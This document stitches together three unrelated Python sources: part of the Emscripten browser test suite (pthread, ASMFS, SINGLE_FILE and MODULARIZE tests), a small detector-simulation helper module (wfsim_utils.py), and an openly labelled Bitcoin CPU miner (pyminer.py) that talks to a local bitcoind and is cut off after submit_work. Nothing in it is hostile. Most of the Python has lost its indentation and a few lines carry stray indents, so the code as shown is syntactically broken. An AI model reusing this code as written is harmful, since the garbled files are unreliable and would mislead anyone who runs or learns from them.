def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'MODULARIZE_INSTANCE=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
  # Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
  # also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-std=c++11', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
  # Tests that it is possible to load two asm.js compiled programs on one page when both --separate-asm and MODULARIZE=1 are used, by assigning
# the pages different asm module names to ensure they do not conflict when being XHRed in.
@no_wasm_backend('this tests asm.js support')
def test_two_separate_asm_files_on_same_page(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'two_separate_asm_files.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page1.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module1', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage1["asm"]']
print(cmd)
subprocess.check_call(cmd)
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page2.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module2', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage2["asm"]']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
# Tests that it is possible to encapsulate asm.js compiled programs by using --separate-asm + MODULARIZE=1. See
# encapsulated_asmjs_page_load.html for the example.
@no_wasm_backend('this tests asm.js support')
def test_encapsulated_asmjs_page_load(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'encapsulated_asmjs_page_load.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'a.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=EmscriptenCode', '-s', 'SEPARATE_ASM_MODULE_NAME="var EmscriptenCode"']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION=1', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION=1', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME=1'])
@requires_threads
@no_fastcomp('offset converter is not supported on fastcomp')
def test_offset_converter(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME=1'])
|
wfsim_utils.py
|
import numpy as np
import os
import pandas as pd
import time
from threading import Thread
# np.int was removed in NumPy 1.24; use the explicit fixed-width np.int64 instead
instruction_dtype = [('event_number', np.int64), ('type', np.int64), ('t', np.int64),
                     ('x', np.float32), ('y', np.float32), ('z', np.float32),
                     ('amp', np.int64), ('recoil', '<U2')]
def rand_instructions(input_inst):
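    # Build two instructions per event (type 1 and type 2), uniformly spaced over the total run time, with random positions in a cylinder (r < 48, -100 < z < 0) and random photon / electron amplitudes.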
n = input_inst['nevents'] = input_inst['event_rate'] * input_inst[
'chunk_size'] * input_inst['nchunk']
input_inst['total_time'] = input_inst['chunk_size'] * input_inst['nchunk']
inst = np.zeros(2 * n, dtype=instruction_dtype)
uniform_times = input_inst['total_time'] * (np.arange(n) + 0.5) / n
inst['t'] = np.repeat(uniform_times, 2) * int(1e9)
inst['event_number'] = np.digitize(inst['t'],
1e9 * np.arange(input_inst['nchunk']) *
input_inst['chunk_size']) - 1
inst['type'] = np.tile([1, 2], n)
inst['recoil'] = ['er' for i in range(n * 2)]
r = np.sqrt(np.random.uniform(0, 48 ** 2, n))
t = np.random.uniform(-np.pi, np.pi, n)
inst['x'] = np.repeat(r * np.cos(t), 2)
inst['y'] = np.repeat(r * np.sin(t), 2)
inst['z'] = np.repeat(np.random.uniform(-100, 0, n), 2)
nphotons = np.random.uniform(200, 2050, n)
nelectrons = 10 ** (np.random.uniform(1, 4, n))
inst['amp'] = np.vstack([nphotons, nelectrons]).T.flatten().astype(int)
return inst
def inst_to_csv(instructions, csv_file):
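    # Generate random instructions and write them to csv_file, one row per instruction.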
pd.DataFrame(rand_instructions(instructions)).to_csv(csv_file, index=False)
def get_timing_grid(input_inst):
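    # Return n + 1 equally spaced time edges spanning the total run time, in nanoseconds.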
n = input_inst['nevents'] = input_inst['event_rate'] * input_inst[
'chunk_size'] * input_inst['nchunk']
input_inst['total_time'] = input_inst['chunk_size'] * input_inst['nchunk']
timing_grid = np.linspace(0, input_inst['total_time'], n + 1) * 1e9
return timing_grid
def check_for_strax_data():
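    # If a strax_data folder already exists, ask whether it should be replaced; return True only on an explicit 'y'.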
strax_folder = "strax_data"
if os.path.exists(strax_folder):
if input(f"Data found in '{strax_folder}', press [y] to remove and "
f"create new data\n").lower() == 'y':
return True
# return False
return False
def timed_check_for_strax_data():
    # Ask the user about existing strax data, with a watchdog thread. The watchdog
    # can only print a reminder after time_out seconds; it cannot interrupt the
    # blocking input() call inside check_for_strax_data().
    time_out = 5  # s
    answer = False
    print(f"Please answer within {time_out} seconds.")
    def check():
        time.sleep(time_out)
        if answer is not True:
            print("Too Slow")
    Thread(target=check, daemon=True).start()
    answer = check_for_strax_data()
    return answer
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
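    # Swap the byte order of each 32-bit word in the buffer.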
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
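    # Reverse the order of the 32-bit words in the buffer (bytes within each word are untouched).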
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
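        # Scan nonces against the 80-byte block header; returns (hashes_done, nonce_bin), with nonce_bin set to None when no share was found.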
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
